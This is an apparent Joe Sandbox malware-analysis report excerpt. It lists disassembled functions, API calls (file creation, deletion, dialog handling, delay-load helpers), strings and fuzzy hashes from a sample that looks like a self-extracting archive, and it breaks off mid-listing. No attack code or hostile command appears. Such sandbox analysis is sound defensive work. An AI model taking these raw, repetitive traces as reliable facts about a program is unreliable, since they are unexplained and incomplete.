Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f68b77d46b9d9972e9f767c33ad81ec869e65bfeb0ff622663cbc970e0e61339
Instruction ID: 9ca2e9b8b3d23b48a29566737f058b2f571fe9597938753e8579520262bfc87a
Opcode Fuzzy Hash: f68b77d46b9d9972e9f767c33ad81ec869e65bfeb0ff622663cbc970e0e61339
Instruction Fuzzy Hash: F2A011E22BC202BC380822002C02C3B020EC0C2B22B32882EF802A00C0A880082E0833

Function 0023E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E3FC

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92a84dddb863f722bee1502aaabffcec83f75f26beb6e9b61e33442ccf164291
Instruction ID: 9ca2e9b8b3d23b48a29566737f058b2f571fe9597938753e8579520262bfc87a
Opcode Fuzzy Hash: 92a84dddb863f722bee1502aaabffcec83f75f26beb6e9b61e33442ccf164291
Instruction Fuzzy Hash: F2A011E22BC202BC380822002C02C3B020EC0C2B22B32882EF802A00C0A880082E0833

Function 0023E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E3FC

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 382c0172fa6fda8e24599e767c4140890d2ba090d58531fef9f752a3467209d8
Instruction ID: 9ca2e9b8b3d23b48a29566737f058b2f571fe9597938753e8579520262bfc87a
Opcode Fuzzy Hash: 382c0172fa6fda8e24599e767c4140890d2ba090d58531fef9f752a3467209d8
Instruction Fuzzy Hash: F2A011E22BC202BC380822002C02C3B020EC0C2B22B32882EF802A00C0A880082E0833

Function 0023E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E3FC

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 39088d3e03100c596512f7bdefb246c70d319b67767ca5d916fe274dc710d35b
Instruction ID: 9ca2e9b8b3d23b48a29566737f058b2f571fe9597938753e8579520262bfc87a
Opcode Fuzzy Hash: 39088d3e03100c596512f7bdefb246c70d319b67767ca5d916fe274dc710d35b
Instruction Fuzzy Hash: F2A011E22BC202BC380822002C02C3B020EC0C2B22B32882EF802A00C0A880082E0833

Function 0023E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E580

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fc1475f6f606131e7d455cdc091ec8c29ede1e2e81c76d79d9dd00cefb37b87e
Instruction ID: 8bcc4f63ce1f6a0eba44265e7c0d13d6a6ec72c9559c2b047aeaf55e71521f7e
Opcode Fuzzy Hash: fc1475f6f606131e7d455cdc091ec8c29ede1e2e81c76d79d9dd00cefb37b87e
Instruction Fuzzy Hash: 74A011C2AB8200BC380822A02C03C3B020EC0C2B2AB32822EF800800C0B8800A3C0C30

Function 0023E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E580

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b5596bd8a66e1d2b355f986e5b76e10c003b63935b2a753acc4ed00b6c75af1
Instruction ID: 66a058b0354b13014268cea02f0850f8e4088e85300290ced70cbe29aa8b1e7f
Opcode Fuzzy Hash: 1b5596bd8a66e1d2b355f986e5b76e10c003b63935b2a753acc4ed00b6c75af1
Instruction Fuzzy Hash: B0A011C2ABC202BC380822A02C03C3B020EC0C2B2AB32882EF802800C0B880083C0C30

Function 0023E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E580

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9b8e8ec69c7c4659277c17ba2b459f8fcc7bd16695f1fdfc019189ef66b96d07
Instruction ID: 66a058b0354b13014268cea02f0850f8e4088e85300290ced70cbe29aa8b1e7f
Opcode Fuzzy Hash: 9b8e8ec69c7c4659277c17ba2b459f8fcc7bd16695f1fdfc019189ef66b96d07
Instruction Fuzzy Hash: B0A011C2ABC202BC380822A02C03C3B020EC0C2B2AB32882EF802800C0B880083C0C30

Function 00229F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0022903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00229F0C

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: f124b6a4406bcab9dfe383f95ad36ee53a529c104cacbfd25232f06a3bd50623
Instruction ID: c03d3a3f86292bd4cfeb0decea7d4b85bfc5f0fbfa739da9f52f20e1861e14d1
Opcode Fuzzy Hash: f124b6a4406bcab9dfe383f95ad36ee53a529c104cacbfd25232f06a3bd50623
Instruction Fuzzy Hash: 78A0113008020A8A8E002B30EA0800E3B20EB20BC230022A8A00ACA0A2CB22880B8A00

Function 0023AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0023AE72,C:\Users\user\Desktop,00000000,0026946A,00000006), ref: 0023AC08

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 1fefa0973b7b40738a2f86004441c3164b0999826628e2913ab4d1c947447bb7
Instruction ID: 7d950d43a750e880edc32c4753ccf97dd3943b9426e260ddf1e4b6b628801255
Opcode Fuzzy Hash: 1fefa0973b7b40738a2f86004441c3164b0999826628e2913ab4d1c947447bb7
Instruction Fuzzy Hash: 92A012301002008786004B319F0950E76556F51741F00C024600480030C730C820A504

Function 00229620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,002295D6,?,?,?,?,?,00252641,000000FF), ref: 0022963B

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 53d2a753ebfde72eb89631620604d6b429f7c63deecba22516b4b06179d962c1
Instruction ID: 72a5294b6b01cbe28512e77e95f0c3739be1168c530c27fe77693233dc40adaf
Opcode Fuzzy Hash: 53d2a753ebfde72eb89631620604d6b429f7c63deecba22516b4b06179d962c1
Instruction Fuzzy Hash: 4DF0E9300A1B26AFDB308EA0E4487A277EC6B13321F042B1ED0E2429E0D37165ED9A40

Non-executed Functions

Function 0023C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00221316: GetDlgItem.USER32(00000000,00003021), ref: 0022135A
Part of subcall function 00221316: SetWindowTextW.USER32(00000000,002535F4), ref: 00221370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0023C2B1
EndDialog.USER32(?,00000006), ref: 0023C2C4
GetDlgItem.USER32(?,0000006C), ref: 0023C2E0
SetFocus.USER32(00000000), ref: 0023C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0023C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0023C358
FindFirstFileW.KERNEL32(?,?), ref: 0023C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0023C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0023C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0023C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0023C3D4
_swprintf.LIBCMT ref: 0023C404

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0023C417
FindClose.KERNEL32(00000000), ref: 0023C41E
_swprintf.LIBCMT ref: 0023C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0023C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0023C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0023C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0023C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0023C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0023C509
_swprintf.LIBCMT ref: 0023C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0023C548
_swprintf.LIBCMT ref: 0023C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0023C5AF

Part of subcall function 0023AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0023AF35
Part of subcall function 0023AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0025E72C,?,?), ref: 0023AF84

Strings

P#, xrefs: 0023C342
%s %s %s, xrefs: 0023C3F2, 0023C527
REPLACEFILEDLG, xrefs: 0023C247
%s %s, xrefs: 0023C469, 0023C58E

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$P#$REPLACEFILEDLG
API String ID: 797121971-385020139
Opcode ID: bfddb92417e025443b58c464574b9ec4d7341fe177b4841aecc8cdce6ecc640b
Instruction ID: 75beb38acb3eb2ab7e1829d35d94aed65f59d881d76dbec1c08c2df60a273529
Opcode Fuzzy Hash: bfddb92417e025443b58c464574b9ec4d7341fe177b4841aecc8cdce6ecc640b
Instruction Fuzzy Hash: 4591A4B2158345BBE321DBA0DC4DFFB77ACEB4AB40F404819F649E6081D771AA148B62

Function 00226FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00226FAA
_wcslen.LIBCMT ref: 00227013
_wcslen.LIBCMT ref: 00227084

Part of subcall function 00227A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00227AAB
Part of subcall function 00227A9C: GetLastError.KERNEL32 ref: 00227AF1
Part of subcall function 00227A9C: CloseHandle.KERNEL32(?), ref: 00227B00

Part of subcall function 0022A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0022977F,?,?,002295CF,?,?,?,?,?,00252641,000000FF), ref: 0022A1F1
Part of subcall function 0022A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0022977F,?,?,002295CF,?,?,?,?,?,00252641), ref: 0022A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00227139
CloseHandle.KERNEL32(00000000), ref: 00227155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00227298

Part of subcall function 00229DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002273BC,?,?,?,00000000), ref: 00229DBC
Part of subcall function 00229DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00229E70

Part of subcall function 00229620: CloseHandle.KERNELBASE(000000FF,?,?,002295D6,?,?,?,?,?,00252641,000000FF), ref: 0022963B

Part of subcall function 0022A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0022A325,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A501
Part of subcall function 0022A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0022A325,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A532

Strings

\??\, xrefs: 0022702B
SeRestorePrivilege, xrefs: 00226FC2
UNC\, xrefs: 00227051
SeCreateSymbolicLinkPrivilege, xrefs: 00226FCC

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: a28909b27cab804a7b32ee46d8645cc1b14b33b19a09d3e3ae2a7bca8d812ba4
Instruction ID: fc8f0901133806c64b55b2dc00607d126eb9a245d3ba2f3d65977c5d0b330c17
Opcode Fuzzy Hash: a28909b27cab804a7b32ee46d8645cc1b14b33b19a09d3e3ae2a7bca8d812ba4
Instruction Fuzzy Hash: 5BC1E871928625BBDB25DFB4EC45FEEB3A8AF04300F004559F956E3182D770AA64CF61

Function 0024D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0024DA34

Strings

1#IND, xrefs: 0024EC2C
1#INF, xrefs: 0024EC41
1#QNAN, xrefs: 0024EC3A
1#SNAN, xrefs: 0024EC33

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: fb97abc9a21fdb47079cde6c92a4acab48a661409b90995165cbc24b0fd39e5a
Instruction ID: 4ab75581863e862969ecc61d64051c4ca3653e657c7c9b7a4c0492822aaecb92
Opcode Fuzzy Hash: fb97abc9a21fdb47079cde6c92a4acab48a661409b90995165cbc24b0fd39e5a
Instruction Fuzzy Hash: 7AC21771E246298FEF29CE289D407EAB7B5FB44305F1541EAD84EE7240E774AE918F40

Function 002232F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00223300
_swprintf.LIBCMT ref: 002236C7

Strings

CMT, xrefs: 00223A17
h%u, xrefs: 002236BC
hc%u, xrefs: 0022370A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: fbd9a29b32b0be9db02d8431de5c5bdec6f2f387c602a5b2e793edecc3feaa25
Instruction ID: 8719dcdda32ab4a16519e549a49cf4a170f7f4efae7d55e352c5fcce5fa0afa8
Opcode Fuzzy Hash: fbd9a29b32b0be9db02d8431de5c5bdec6f2f387c602a5b2e793edecc3feaa25
Instruction Fuzzy Hash: 4232F771520395BFDF18DFB4D895AE937A5AF15300F04047EFD8A8B282DB749A69CB20

Function 0022286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00222874
_strlen.LIBCMT ref: 00222E3F

Part of subcall function 002302BA: __EH_prolog.LIBCMT ref: 002302BF

Part of subcall function 00231B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0022BAE9,00000000,?,?,?,0001042E), ref: 00231BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00222F91

Strings

CMT, xrefs: 00222FBC

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 7d67b813a435f11bac39c2eb2c2e10764b743c9eccdbe36c973d5c392285834b
Instruction ID: 9ef7b9c9d5d2631495fc940380e06906e477a6b0e95fb8121d142f19c1564f21
Opcode Fuzzy Hash: 7d67b813a435f11bac39c2eb2c2e10764b743c9eccdbe36c973d5c392285834b
Instruction Fuzzy Hash: 82625771520265EFCB19CFB4D8857EA37A1EF14300F18457EFC9A8B282DB759969CB20

Function 0023F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0023F844
IsDebuggerPresent.KERNEL32 ref: 0023F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0023F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0023F93A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

